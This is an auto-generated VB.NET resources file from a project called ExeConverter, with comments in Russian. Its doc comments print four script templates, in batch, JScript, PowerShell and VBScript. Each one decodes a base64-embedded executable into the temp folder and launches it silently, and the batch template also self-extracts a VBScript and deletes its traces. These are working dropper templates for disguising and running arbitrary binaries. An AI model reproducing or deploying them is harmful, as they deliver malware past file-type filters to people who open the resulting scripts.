'------------------------------------------------------------------------------
' <auto-generated>
'     Этот код создан программой.
'     Исполняемая версия:4.0.30319.42000
'
'     Изменения в этом файле могут привести к неправильной работе и будут потеряны в случае
'     повторной генерации кода.
' </auto-generated>
'------------------------------------------------------------------------------


Namespace ExeConverter.Properties


    ''' <summary>
    '''   Класс ресурса со строгой типизацией для поиска локализованных строк и т.д.
    ''' </summary>
    ' Этот класс создан автоматически классом StronglyTypedResourceBuilder
    ' с помощью такого средства, как ResGen или Visual Studio.
    ' Чтобы добавить или удалить член, измените файл .ResX и снова запустите ResGen
    ' с параметром /str или перестройте свой проект VS.
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")>
    <Global.System.Diagnostics.DebuggerNonUserCodeAttribute()>
    <Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()>
    Friend Class Resources

        Private Shared resourceMan As Global.System.Resources.ResourceManager

        Private Shared resourceCulture As Global.System.Globalization.CultureInfo

        <Global.System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")>
        Friend Sub New()
        End Sub

        ''' <summary>
        '''   Возвращает кэшированный экземпляр ResourceManager, использованный этим классом.
        ''' </summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>
        Friend Shared ReadOnly Property ResourceManager As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(ExeConverter.Properties.Resources.resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("ExeConverter.Properties.Resources", GetType(ExeConverter.Properties.Resources).Assembly)
                    ExeConverter.Properties.Resources.resourceMan = temp
                End If
                Return ExeConverter.Properties.Resources.resourceMan
            End Get
        End Property

        ''' <summary>
        '''   Перезаписывает свойство CurrentUICulture текущего потока для всех
        '''   обращений к ресурсу с помощью этого класса ресурса со строгой типизацией.
        ''' </summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>
        Friend Shared Property Culture As Global.System.Globalization.CultureInfo
            Get
                Return ExeConverter.Properties.Resources.resourceCulture
            End Get
            Set(ByVal value As Global.System.Globalization.CultureInfo)
                ExeConverter.Properties.Resources.resourceCulture = value
            End Set
        End Property

        ''' <summary>
        '''   Ищет локализованную строку, похожую на @Echo off
        ''' #echos#
        ''' findstr /e &quot;&apos;v&quot; &quot;%~f0&quot;&gt;%tmp%\x.vbs
        ''' cscript //nologo %tmp%\x.vbs
        ''' del %tmp%\x
        ''' del %tmp%\x.vbs
        ''' start &quot;&quot; %tmp%\x.exe
        ''' exit
        ''' Set f=CreateObject(&quot;Scripting.FileSystemObject&quot;)&apos;v
        ''' Set p=f.GetSpecialFolder(2)&apos;v
        ''' Set i=f.OpenTextFile(p+&quot;\x&quot;,1)&apos;v
        ''' c=i.ReadAll()&apos;v
        ''' i.Close&apos;v
        ''' Set x=CreateObject(&quot;Msxml2.DOMDocument&quot;)&apos;v
        ''' Set o=x.CreateElement(&quot;base64&quot;)&apos;v
        ''' o.dataType=&quot;bin.base64&quot;&apos;v
        ''' o.text=c&apos;v
        ''' Set b=CreateObject(&quot;ADODB.Stream&quot;)&apos;v
        ''' b.Type=1&apos;v
        ''' b.Open&apos;v
        ''' b.Write o.NodeTypedValue&apos;v
        ''' b.SaveToFile p+&quot;\ [остаток строки не уместился]&quot;;.
        ''' </summary>
        Friend Shared ReadOnly Property exe2bat As String
            Get
                Return ExeConverter.Properties.Resources.ResourceManager.GetString("exe2bat", ExeConverter.Properties.Resources.resourceCulture)
            End Get
        End Property

        ''' <summary>
        '''   Ищет локализованную строку, похожую на var D=new ActiveXObject(&quot;Microsoft.XMLDOM&quot;)
        ''' var E=D.createElement(&quot;t&quot;)
        ''' E.dataType=&quot;bin.base64&quot;
        ''' E.text=&quot;#base64#&quot;
        ''' var b=new ActiveXObject(&quot;ADODB.Stream&quot;)
        ''' var p=new ActiveXObject(&quot;Scripting.FileSystemObject&quot;).GetSpecialFolder(2)
        ''' b.Type=1
        ''' b.Open()
        ''' b.Write(E.nodeTypedValue)
        ''' b.SaveToFile(p+&quot;\\x.exe&quot;,2)
        ''' new ActiveXObject(&quot;WScript.Shell&quot;).Run(p+&quot;\\x.exe&quot;).
        ''' </summary>
        Friend Shared ReadOnly Property exe2js As String
            Get
                Return ExeConverter.Properties.Resources.ResourceManager.GetString("exe2js", ExeConverter.Properties.Resources.resourceCulture)
            End Get
        End Property

        ''' <summary>
        '''   Ищет локализованную строку, похожую на $p=[IO.Path]::Combine($env:TEMP,&quot;x.exe&quot;)
        ''' [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String(&quot;#base64#&quot;))
        ''' Start-Process $p.
        ''' </summary>
        Friend Shared ReadOnly Property exe2ps1 As String
            Get
                Return ExeConverter.Properties.Resources.ResourceManager.GetString("exe2ps1", ExeConverter.Properties.Resources.resourceCulture)
            End Get
        End Property

        ''' <summary>
        '''   Ищет локализованную строку, похожую на Option Explicit
        ''' dim D,E,b,p
        ''' Set D=CreateObject(&quot;Microsoft.XMLDOM&quot;)
        ''' Set E=D.createElement(&quot;t&quot;)
        ''' E.DataType=&quot;bin.base64&quot;
        ''' E.Text=&quot;#base64#&quot;
        ''' Set b=CreateObject(&quot;ADODB.Stream&quot;)
        ''' Set p=CreateObject(&quot;Scripting.FileSystemObject&quot;).GetSpecialFolder(2)
        ''' b.Type=1
        ''' b.Open
        ''' b.Write E.NodeTypedValue
        ''' b.SaveToFile p+&quot;\x.exe&quot;,2
        ''' CreateObject(&quot;WScript.Shell&quot;).Run p+&quot;\x.exe&quot;.
        ''' </summary>
        Friend Shared ReadOnly Property exe2vbs As String
            Get
                Return ExeConverter.Properties.Resources.ResourceManager.GetString("exe2vbs", ExeConverter.Properties.Resources.resourceCulture)
            End Get
        End Property
    End Class
End Namespace
